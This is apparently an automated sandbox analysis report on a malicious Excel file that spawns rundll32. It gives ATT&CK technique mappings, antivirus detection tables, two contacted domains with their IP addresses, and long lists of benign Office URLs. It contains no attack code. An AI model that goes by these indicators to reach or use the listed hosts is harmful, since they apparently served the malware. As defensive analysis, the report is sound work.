Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: rundll32.exe, 00000002.00000002.254779799.0000000004B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.247986527.0000000004BB0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: rundll32.exe, 00000002.00000002.254779799.0000000004B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.247986527.0000000004BB0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: rundll32.exe, 00000002.00000002.254779799.0000000004B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.247986527.0000000004BB0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000002.00000002.254779799.0000000004B20000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.247986527.0000000004BB0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
32154f4c_by_Libranalysis.xls4%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
signifysystem.com0%VirustotalBrowse
fcventasyservicios.cl0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://ncus.contentsync.0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://wus2.contentsync.0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%VirustotalBrowse
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://ncus.pagecontentsync.0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%VirustotalBrowse
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalseunknown
fcventasyservicios.cl
192.185.32.232
truefalseunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
    high
    https://login.microsoftonline.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
      high
      https://shell.suite.office.com:1443EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
          high
          https://autodiscover-s.outlook.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
              high
              https://cdn.entity.EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                high
                https://clients.config.office.net/user/v1.0/tenantassociationkeyEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                    high
                    https://powerlift.acompli.netEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                      high
                      https://cortana.aiEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                high
                                https://api.aadrm.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                      high
                                      https://cr.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                            high
                                            https://graph.ppe.windows.netEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                            high
                                                            https://graph.windows.netEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                        high
                                                                        https://ncus.contentsync.EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                      high
                                                                                      https://wus2.contentsync.EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://incidents.diagnostics.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/iosEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmediaEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/ActivitiesEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                high
                                                                                                https://api.office.netEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                    • 0%, Virustotal, Browse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policiesEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocationEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/logEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.net/common/oauth2/authorizeEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/importsEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.comEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                high
                                                                                                                                https://ncus.pagecontentsync.EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/EFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEFB6B18F-65BF-445D-97B5-07043DE10A60.0.drfalse
                                                                                                                                      high
